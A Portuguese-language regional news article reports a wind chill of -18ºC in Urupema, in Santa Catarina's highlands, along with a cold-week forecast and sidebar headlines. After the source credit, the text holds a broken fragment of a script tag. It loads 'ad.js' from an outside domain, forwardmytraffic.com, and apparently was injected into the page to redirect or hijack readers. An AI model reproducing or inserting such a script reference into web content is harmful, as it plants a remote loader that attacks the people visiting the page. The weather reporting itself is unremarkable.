InícioDestaqueSerra de SC, tem sensação térmica de -18ºC neste domingo.

Serra de SC, tem sensação térmica de -18ºC neste domingo.

Últimas notícias

Governo propõe salário mínimo de R$ 1.502 em 2025

O salário mínimo em 2025 será de R$ 1.502,...

Regulamentado direito das crianças e adolescentes em ambiente digital

Uma resolução do Ministério dos Direitos Humanos e da...

Quem esperou pela neve, prevista para as regiões mais altas de Santa Catarina neste fim de semana, ficou com a parte mais gelada – e menos glamourosa – do fenômeno. A sensação térmica, que é a forma como sentimos a temperatura do ar, chegou a -18ºC em Urupema, na Serra Catarinense. A medida leva em consideração a temperatura real, que foi de 0,8ºC, e a velocidade do vento – nesse caso, 50 km/h.

 

 

– Tivemos condições para a formação de neve ou de chuva congelada, com bastante umidade e baixa temperatura, mas não há registro desses fenômenos – explica a meteorologista da Epagri/Ciram Gilsânia Cruz.

 

 

Segundo o meteorologista da NSC Comunicação, Leandro Puchalski, há pouca nebulosidade sobre o Estado, favorecendo um dia mais seco e afastando a possibilidade de neve para as próximas horas. As temperaturas da tarde ficam entre 18ºC e 21ºC em boa parte das cidades, mas não passando muito mais dos 8ºC a 10ºC na Serra.

Frio em Urupema na madrugada de domingo, 20

 

A semana começa gelada em boa parte do Estado. O ar frio segue trazendo noites e manhãs geladas no início da semana. A segunda-feira tem sol em todas as áreas com formação de geada no Planalto e áreas de baixada do Oeste e Meio-Oeste. As temperaturas poderão baixar até um pouco mais do que hoje. Na Serra, -2ºC a 0ºC. Durante a tarde, pela presença do sol as temperaturas ficam mais agradáveis.

 

 

 

fonte: Diario catarinense, Epagri…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.